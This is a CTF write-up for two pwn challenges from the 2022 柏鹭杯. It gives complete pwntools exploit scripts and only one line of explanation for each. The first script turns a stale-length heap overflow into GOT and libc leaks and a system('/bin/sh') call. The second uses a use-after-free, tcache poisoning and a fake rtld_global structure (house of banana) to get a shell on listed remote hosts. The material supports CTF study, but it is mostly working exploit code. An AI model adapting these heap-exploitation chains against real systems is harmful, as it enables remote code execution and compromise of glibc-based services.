
2022柏鹭杯-pwn

2022柏鹭杯pwn题

pwn1

更新name的时候并没有将原先控制堆块对应的length字段更新。先申请大堆块，第一次更新时把它释放掉并申请小堆块，再次更新name就能堆溢出了。堆溢出改掉func直接getshell

from pwn import *
binary = "./note1"
elf = ELF(binary)
libc = elf.libc
ip = '1.14.71.254'
port = 28834
local = 1
# local != 0 runs the binary in-process; otherwise the script talks to the remote service.
io = process(binary) if local else remote(ip, port)

#context.log_level = "debug"

def debug():
    """Attach gdb to the live target, then block until the script is resumed."""
    gdb.attach(io)
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send bytes followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for *text*, then send *data* (no newline)."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for *text*, then send *data* plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including *text*."""
    return io.recvuntil(text)


def uu32():
    """Read through the next 0xff byte and unpack its last 4 bytes as a u32."""
    tail = io.recvuntil(b"\xff")[-4:]
    return u32(tail.ljust(4, b'\x00'))


def uu64():
    """Read through the next 0x7f byte and unpack its last 6 bytes as a u64."""
    tail = io.recvuntil(b"\x7f")[-6:]
    return u64(tail.ljust(8, b"\x00"))


def lg(data):
    """Log the hex value of the script variable named by *data*.

    NOTE: *data* is passed to eval(); it must only ever be a literal
    variable name written in this script, never anything read from the
    target.
    """
    value = eval(data)
    return io.success('%s -> 0x%x' % (data, value))


def ia():
    """Hand the connection over to the operator."""
    return io.interactive()


# Unused in this script; kept for compatibility with the shared template.
_flags = 0xfbad1800

def menu(n):
    """Choose menu entry *n* at the `> ` prompt."""
    choice = str(n)
    sla(b'> ', choice)


def add(idx, size, func=2, tag=b' ', name=b'a'):
    """Create note *idx* (menu entry 1).

    Answers the five `: ` prompts in the order the service asks for them:
    index, size, name, tag, func selector.
    """
    menu(1)
    answers = (str(idx), str(size), name, tag, str(func))
    for answer in answers:
        sla(b': ', answer)

def edit_name(idx, size, con=b'b'):
    """Rewrite the name of note *idx* (menu 2, sub-option 1).

    *size* is the length the service is told to read for the new name; the
    writeup's bug is that the stored length of the original buffer is not
    refreshed by this operation.
    """
    menu(2)
    sla(b'id: ', str(idx))
    sla(b'> ', str(1))
    for answer in (str(size), con):
        sla(b': ', answer)

def edit_tag(idx, tag):
    """Overwrite the tag of note *idx* (menu 2, sub-option 2).

    The tag is sent raw with sendafter, i.e. without a trailing newline.
    """
    menu(2)
    for prompt, value in ((b'id: ', str(idx)), (b'> ', str(2))):
        sla(prompt, value)
    sa(b': ', tag)

def edit_func(idx, func):
    """Change the func selector of note *idx* (menu 2, sub-option 3)."""
    menu(2)
    steps = ((b'id: ', str(idx)), (b'> ', str(3)), (b': ', str(func)))
    for prompt, value in steps:
        sla(prompt, value)

def call(idx):
    """Invoke the func of note *idx* (menu entry 3)."""
    menu(3)
    target = str(idx)
    sla(b': ', target)



# --- note1 chain; statement order matters, do not reorder ---
# Root cause (per the writeup): renaming a note does not refresh the stored
# length of its buffer. Defensive fix on the service side: record the new
# length together with the new buffer and bound every later write by the
# current allocation.

# Step 1: one large note.
add(0, 0x420, tag = b' ', name = b'a' * 0x420)

# Step 2: plant a marker in the tag, select func 1 and call it; the reply
# carries the marker followed by an address from which the program base is derived.
edit_tag(0, p64(0xdeadbeefdeadbeef))
edit_func(0, 1)
call(0)
ru(b'\xef\xbe\xad\xde\xef\xbe\xad\xde')   # little-endian form of the marker above
base = u64(io.recv(6).ljust(8, b'\x00')) - 0x131B   # 0x131B is specific to this binary
lg('base')

# Step 3: shrink the name (the writeup's "release the big chunk") and create a small note.
edit_name(0, 0x10)

add(1, 0x10, tag = b' ', name = b'a')

# Step 4: rename with the stale large length -- the overflow the writeup describes.
# The payload rewrites note 1's fields so that call(1) prints puts@GOT, giving a libc address.
edit_name(0, 0x41f, p64(0) * 3 + p64(0x31) + p64(0) + p64(base + 0x131b) + p64(base + elf.got['puts']) + p64(0x421))

call(1)
libcbase = uu64() - libc.sym['puts']
lg('libcbase')
sys_addr = libcbase + libc.sym['system']
sh = libcbase + libc.search(b'/bin/sh').__next__()   # first "/bin/sh" string in libc

# Step 5: same overflow again with "/bin/sh" and system; call(1) then runs it.
edit_name(0, 0x41f, p64(0) * 3 + p64(0x31) + b'/bin/sh\x00' + p64(sys_addr))
call(1)
ia()

pwn2

uaf打house of banana

from pwn import *
binary = "./note2"
elf = ELF(binary)
libc = elf.libc
ip = '39.101.77.163'
port = 12032
local = 0
# local != 0 runs the binary in-process; as committed (local = 0) the script talks to the remote service.
io = process(binary) if local else remote(ip, port)

# Full pwntools I/O trace; noisy, but useful while matching prompts.
context.log_level = "debug"

def debug():
    """Attach gdb to the live target, then block until the script is resumed."""
    gdb.attach(io)
    pause()

def s(data):
    """Send raw bytes to the target."""
    return io.send(data)


def sl(data):
    """Send bytes followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for *text*, then send *data* (no newline)."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for *text*, then send *data* plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including *text*."""
    return io.recvuntil(text)


def uu32():
    """Read through the next 0xff byte and unpack its last 4 bytes as a u32."""
    tail = io.recvuntil(b"\xff")[-4:]
    return u32(tail.ljust(4, b'\x00'))


def uu64():
    """Read through the next 0x7f byte and unpack its last 6 bytes as a u64."""
    tail = io.recvuntil(b"\x7f")[-6:]
    return u64(tail.ljust(8, b"\x00"))


def lg(data):
    """Log the hex value of the script variable named by *data*.

    NOTE: *data* is passed to eval(); it must only ever be a literal
    variable name written in this script, never anything read from the
    target.
    """
    value = eval(data)
    return io.success('%s -> 0x%x' % (data, value))


def ia():
    """Hand the connection over to the operator."""
    return io.interactive()


# Unused in this script; kept for compatibility with the shared template.
_flags = 0xfbad1800

def menu(n):
    """Choose menu entry *n* at the `> ` prompt."""
    choice = str(n)
    sla(b'> ', choice)

def add(idx, size, con=b'a'):
    """Create note *idx* of *size* bytes holding *con* (menu entry 1)."""
    menu(1)
    steps = ((b'> ', str(idx)), (b'> ', str(size)), (b': ', con))
    for prompt, value in steps:
        sla(prompt, value)

def delete(idx):
    """Free note *idx* (menu entry 2).

    Per the writeup the slot stays usable afterwards (use-after-free), which
    is what show()/delete() on an already-freed index relies on below.
    """
    menu(2)
    slot = str(idx)
    sla(b'> ', slot)

def show(idx):
    """Print the contents of note *idx* (menu entry 3)."""
    menu(3)
    slot = str(idx)
    sla(b'> ', slot)

# --- note2 chain (writeup: UAF -> house of banana); statement order matters ---
# Root cause: delete() leaves the slot usable, so show() and delete() on an
# already-freed note still work. Defensive fix on the service side: clear the
# slot pointer on free and reject operations on empty slots -- both leaks
# below depend on the dangling reference.

# Ten notes of the same size.
for i in range(10):
    add(i, 0xf8)

# Free the first seven, then read note 0 after its free (the UAF read).
for i in range(7):
    delete(i)
show(0)
key = u64(io.recv(5).ljust(8, b'\x00'))   # 5 bytes read back from the freed note
heapbase = key << 12
lg('key')
lg('heapbase')

# Free note 8 and read it back; uu64() picks a libc pointer out of the reply.
delete(8)
show(8)

# Every raw constant below is an offset into one specific libc build.
libcbase = uu64() - 0x219ce0
environ = libcbase + 0x221200   # computed but never used in this script
sys_addr = libcbase + 0x50d60
sh = libcbase + libc.search(b'/bin/sh').__next__()   # first "/bin/sh" string in libc
set_context = libcbase + libc.sym['setcontext'] + 61
l_next = libcbase + 0x265890
rtld = libcbase + 0x264040
ret = libcbase + 0x29cd6
pop_rdi = libcbase + 0x2a3e5
lg('libcbase')

# Heap shaping: sizes and order were tuned for this binary; do not change.
delete(7)
add(6, 0x1f0)

add(0, 0xf0)

delete(8)
delete(7)

# Overlapping write whose trailing pointer is rtld masked with the key from the first leak.
add(0, 0x1f0, b'a' * 0xf0 + p64(0) + p64(0x101) + p64((rtld) ^ key))

add(0, 0xf0)
add(0, 0xf0, p64(heapbase + 0xcb0) + b'\x04' + b'\x00' * 7)


# Fake rtld_global-shaped structure (per the variable name) placed at heapbase + 0xcb0.
# Several fields point back into the structure itself; the trailing
# padding pins its total length before the three self-pointers.
fake_rtld_global_addr = heapbase + 0xcb0
fake_rtld_global = p64(0) + p64(l_next) + p64(0) + p64(fake_rtld_global_addr)
fake_rtld_global += p64(set_context) + p64(ret)
fake_rtld_global += p64(sh)
fake_rtld_global += p64(ret)
fake_rtld_global += p64(sys_addr)
fake_rtld_global += b'\x00' * 0x80
fake_rtld_global += p64(fake_rtld_global_addr + 0x28 + 0x18)
fake_rtld_global += p64(pop_rdi)
fake_rtld_global += b'\x00' * (0x100 - len(fake_rtld_global))
fake_rtld_global += p64(fake_rtld_global_addr + 0x10 + 0x110) * 3
fake_rtld_global += p64(0x10)


add(0, 0x18, b'a' * 0x10 + p64(fake_rtld_global_addr + 0x20))
add(1, 0x200, fake_rtld_global)


payload = b'\x00' * 0xfc
payload += p8(0x8) + b'\x00' * 3
add(2, 0x200, payload)
# Option 4 is presumably exit, which is when the fake structure is meant to be consumed -- confirm against the binary.
menu(4)
ia()